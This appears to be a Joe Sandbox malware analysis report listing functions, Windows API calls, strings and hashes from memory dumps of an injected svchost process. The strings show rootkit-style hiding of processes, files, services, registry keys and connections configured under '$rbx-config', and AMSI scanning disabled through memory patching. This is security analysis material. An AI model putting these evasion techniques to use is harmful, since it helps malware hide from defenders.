Function 00000158709D1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000158709D1E7F

Part of subcall function 00000158709D22A8: GetModuleHandleA.KERNEL32(?,?,?,00000158709D1EB1), ref: 00000158709D22C0
Part of subcall function 00000158709D22A8: GetProcAddress.KERNEL32(?,?,?,00000158709D1EB1), ref: 00000158709D22D1

CreateThread.KERNELBASE ref: 00000158709D2043
TlsAlloc.KERNEL32 ref: 00000158709D2049
TlsAlloc.KERNEL32 ref: 00000158709D2055
TlsAlloc.KERNEL32 ref: 00000158709D2061
TlsAlloc.KERNEL32 ref: 00000158709D206D
TlsAlloc.KERNEL32 ref: 00000158709D2079
TlsAlloc.KERNEL32 ref: 00000158709D2085

Strings

advapi32.dll, xrefs: 00000158709D1F57, 00000158709D1F78
ntdll.dll, xrefs: 00000158709D1E8D
PdhGetFormattedCounterArrayW, xrefs: 00000158709D1FF1
EnumServiceGroupW, xrefs: 00000158709D1F50
EnumServicesStatusExW, xrefs: 00000158709D1F71, 00000158709D1F92
NtQueryDirectoryFile, xrefs: 00000158709D1EDF
amsi.dll, xrefs: 00000158709D2019
NtQueryDirectoryFileEx, xrefs: 00000158709D1EFC
PdhGetRawCounterArrayW, xrefs: 00000158709D1FD0
pdh.dll, xrefs: 00000158709D1FD7, 00000158709D1FF8
NtDeviceIoControlFile, xrefs: 00000158709D1FB6
sechost.dll, xrefs: 00000158709D1F99
AmsiScanBuffer, xrefs: 00000158709D2012
NtQuerySystemInformation, xrefs: 00000158709D1EA5
NtEnumerateKey, xrefs: 00000158709D1F19
NtResumeThread, xrefs: 00000158709D1EC2
NtEnumerateValueKey, xrefs: 00000158709D1F36

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 4c053896abf497d96071b4309c6c02f7f596486a49a2d1bd45f1df66b4f49580
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 3E5190B9198E4AE5EB04DF64EC417D43720B7DC347FA04513A4993E272DE789A6BCB80

Function 00000158709D1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000158709D1E47
GetProcAddress.KERNEL32 ref: 00000158709D1E57
SleepEx.KERNELBASE ref: 00000158709D1E67

Strings

AmsiScanBuffer, xrefs: 00000158709D1E50
amsi.dll, xrefs: 00000158709D1E40

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: ded0c7d0441ca8acc662626e2673fbba77aa7577a5bd333bc019f25f1f1bcf63
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: F1D0127A615D00F1E908AB10DC503D433217BDCB43FF00814C44E29371DE2C8C6B8B10

Function 00000158709D3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000158709D3A35
PathFindFileNameW.SHLWAPI ref: 00000158709D3A44

Part of subcall function 00000158709D3F88: StrCmpNIW.KERNELBASE(?,?,?,00000158709D272F), ref: 00000158709D3FA0

Part of subcall function 00000158709D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3EDB
Part of subcall function 00000158709D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F0E
Part of subcall function 00000158709D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F2E
Part of subcall function 00000158709D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F47
Part of subcall function 00000158709D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F68

CreateThread.KERNELBASE ref: 00000158709D3A8B

Part of subcall function 00000158709D1E74: GetCurrentThread.KERNEL32 ref: 00000158709D1E7F
Part of subcall function 00000158709D1E74: CreateThread.KERNELBASE ref: 00000158709D2043
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2049
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2055
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2061
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D206D
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2079
Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2085

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 27e660130ceafbbeb60a36b15d8e932c03324a6b7c904a276c5479b962a21c25
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: DD11403E7A8E09D2FB609B21AD493D93290A7DC347FB081159486B92D6DF78C4568E50

Function 00000158709D3F88 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.KERNELBASE(?,?,?,00000158709D272F), ref: 00000158709D3FA0

Strings

$rbx-, xrefs: 00000158709D3F99

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID:
String ID: $rbx-
API String ID: 0-3661604363
Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction ID: 9e1dcff7dcb0904ccd5c3180fb8a25bb3454f700ec6f186123d0db67a26fca22
Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction Fuzzy Hash: 90D05E7A762B0AD6FB149FA59CD07E473609B88746F589025D91029110DF588D9FCE10

Function 00000158709A2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000158709A302E

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: bd5ca5f642ab86e21cca34bb4256160e0d42c92a1db00a46c7891cc540fa75cb
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 0E913BB6709A50C7DB548F25D800BBDB391F788B96F64C125EE496B788DE34D813DB00

Function 00000158709D1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000158709D1724: GetProcessHeap.KERNEL32 ref: 00000158709D172F
Part of subcall function 00000158709D1724: HeapAlloc.KERNEL32 ref: 00000158709D173E
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17AE
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17DB
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D17F5
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1815
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1830
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1850
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D186B
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D188B
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18A6
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18C6

SleepEx.KERNELBASE ref: 00000158709D1BDF

Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18E1
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1901
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D191C
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D193C
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1957
Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1977
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1992
Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D199C

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 99afdf321e2277e0836023fd661ca6caa5315dd7e74dd3d36231a4d3ee5876e6
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: C631037F2D4E49E1EB509B36ED403E933A4A7CCBC2F2454219E49AF397DF14C4528A14

Non-executed Functions

Function 00000158709D1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D172F
HeapAlloc.KERNEL32 ref: 00000158709D173E

Part of subcall function 00000158709D1264: GetProcessHeap.KERNEL32 ref: 00000158709D126A
Part of subcall function 00000158709D1264: HeapAlloc.KERNEL32 ref: 00000158709D1279
Part of subcall function 00000158709D1264: GetProcessHeap.KERNEL32 ref: 00000158709D1293
Part of subcall function 00000158709D1264: HeapAlloc.KERNEL32 ref: 00000158709D12A4

Part of subcall function 00000158709D1000: GetProcessHeap.KERNEL32 ref: 00000158709D1006
Part of subcall function 00000158709D1000: HeapAlloc.KERNEL32 ref: 00000158709D1015
Part of subcall function 00000158709D1000: GetProcessHeap.KERNEL32 ref: 00000158709D1028
Part of subcall function 00000158709D1000: HeapAlloc.KERNEL32 ref: 00000158709D1037

RegOpenKeyExW.ADVAPI32 ref: 00000158709D17AE
RegOpenKeyExW.ADVAPI32 ref: 00000158709D17DB
RegCloseKey.ADVAPI32 ref: 00000158709D17F5
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1815
RegCloseKey.ADVAPI32 ref: 00000158709D1830
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1850
RegCloseKey.ADVAPI32 ref: 00000158709D186B
RegOpenKeyExW.ADVAPI32 ref: 00000158709D188B
RegCloseKey.ADVAPI32 ref: 00000158709D18A6
RegOpenKeyExW.ADVAPI32 ref: 00000158709D18C6
RegCloseKey.ADVAPI32 ref: 00000158709D18E1
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1901
RegCloseKey.ADVAPI32 ref: 00000158709D191C
RegOpenKeyExW.ADVAPI32 ref: 00000158709D193C
RegCloseKey.ADVAPI32 ref: 00000158709D1957
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1977
RegCloseKey.ADVAPI32 ref: 00000158709D1992
RegCloseKey.ADVAPI32 ref: 00000158709D199C

Part of subcall function 00000158709D12B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000158709D1315
Part of subcall function 00000158709D12B8: GetProcessHeap.KERNEL32 ref: 00000158709D1323
Part of subcall function 00000158709D12B8: HeapAlloc.KERNEL32 ref: 00000158709D1334
Part of subcall function 00000158709D12B8: RegEnumValueW.ADVAPI32 ref: 00000158709D1393
Part of subcall function 00000158709D12B8: GetProcessHeap.KERNEL32 ref: 00000158709D13DB
Part of subcall function 00000158709D12B8: HeapAlloc.KERNEL32 ref: 00000158709D13E9
Part of subcall function 00000158709D12B8: GetProcessHeap.KERNEL32 ref: 00000158709D1406
Part of subcall function 00000158709D12B8: HeapFree.KERNEL32 ref: 00000158709D1414
Part of subcall function 00000158709D12B8: lstrlenW.KERNEL32 ref: 00000158709D141D
Part of subcall function 00000158709D12B8: GetProcessHeap.KERNEL32 ref: 00000158709D142B
Part of subcall function 00000158709D12B8: HeapAlloc.KERNEL32 ref: 00000158709D1439

Strings

SOFTWARE\$rbx-config, xrefs: 00000158709D178E
pid, xrefs: 00000158709D180E
service_names, xrefs: 00000158709D18BF
paths, xrefs: 00000158709D1884
udp, xrefs: 00000158709D1970
tcp_local, xrefs: 00000158709D18FA
startup, xrefs: 00000158709D17D1
process_names, xrefs: 00000158709D1849
tcp_remote, xrefs: 00000158709D1935

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 34eba271fe64f6e87b97d7e2c74a7b09dd64441d5f66f9b03ff91c9cb90ed8e9
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 4E71073B614E54E6EB109F75EC507D933A4FBC8B8AF501111EA4D6BB29DE34C856CB40

Function 00000158709A962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000158709A9689

Part of subcall function 00000158709AA544: __GetUnwindTryBlock.LIBCMT ref: 00000158709AA587
Part of subcall function 00000158709AA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000158709AA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000158709A9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000158709A99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000158709A9ABC

Strings

csm, xrefs: 00000158709A970A
csm, xrefs: 00000158709A9784
csm, xrefs: 00000158709A96A3

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: de339c0fb1de0677f009c575950b8b3d51883e1f70b30aad39766b42995028c3
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 8FD17FBA608B40C6EB609F65DC403DE77A0F7D9799F204115EE896BB96DF34C182DB00

Function 00000158709A7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000158709A7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000158709A70CA
_RTC_Initialize.LIBCMT ref: 00000158709A70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000158709A711E
__scrt_release_startup_lock.LIBCMT ref: 00000158709A7149

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: ecc2726804282fe2a17d08a4c5024c43b5ef019938767f2e6cf263d55aaa75da
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: BD81A2B9608E41C6FA54DB659C423E9B2D0ABCE786F3540159908BF396DF38C847EF00

Function 00000158709D6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000158709D62AB
GetThreadContext.KERNEL32 ref: 00000158709D6415

Part of subcall function 00000158709D60A0: GetCurrentThreadId.KERNEL32 ref: 00000158709D60A4

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 59c74060c04ae75cc36f545caf049ef16840bd4a7e17b3c313b3edb9e8559638
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 5BD16A7A248F48C5DA60DB1AE89439AB7A0F3CCB85F604116EACD5B769DF39C551CF00

Function 00000158709D3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000158709D275A), ref: 00000158709D372A
StrCpyW.SHLWAPI ref: 00000158709D373A
StrCatW.SHLWAPI ref: 00000158709D3746
PathCombineW.SHLWAPI(?,?,00000000,00000158709D275A), ref: 00000158709D3754

Strings

\\.\pipe\, xrefs: 00000158709D3720

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: a6f3d1c687b8db6c68a94a19b5b10f27886df43c305b5d726ad5c77cda59f1b8
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 1CF089B9704F84D1EA544B13BD142997251B78CFC2F649030ED565FB69CE2CC8578B00

Function 00000158709A9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709A9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000158709A9FBC

Strings

csm, xrefs: 00000158709A9EF6
csm, xrefs: 00000158709AA00E

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: d7d2215471525ce6f65d07c58f0532b280a199a0fc6e1af3ccf6d9864cfbd952
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 985193BA108A40CBEB748F21DD443997790F399B96F344116DA49ABBD5CF38C852DF41

Function 00000158709DA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000158709DA75B
_CallSETranslator.LIBVCRUNTIME ref: 00000158709DA7A7

Strings

RCC, xrefs: 00000158709DA777
MOC, xrefs: 00000158709DA76F

Memory Dump Source

Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 231f09d94d4f40c4da4ed4df95580b63def9bc2c6fe1ce20596efff4a7009f8d
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: F8616E76508BC8C5DB219B15E8407DAB7A0F7C9B95F144215EB982BB96DF7CC1A2CF00

Function 00000158709A80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709A80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000158709A8162

Strings

csm, xrefs: 00000158709A8149

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 0b78fa305994587dd4c0c82ff328e02ddb1d51e691a3adc279623a161738457c
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6351D47A319E00CAEB54CB15D844BAEB391F388B99F258525DE566B788DF78C843DB00

Function 00000158709A9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000158709A9BA7

Strings

MOC, xrefs: 00000158709A9B6F
RCC, xrefs: 00000158709A9B77

Memory Dump Source

Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

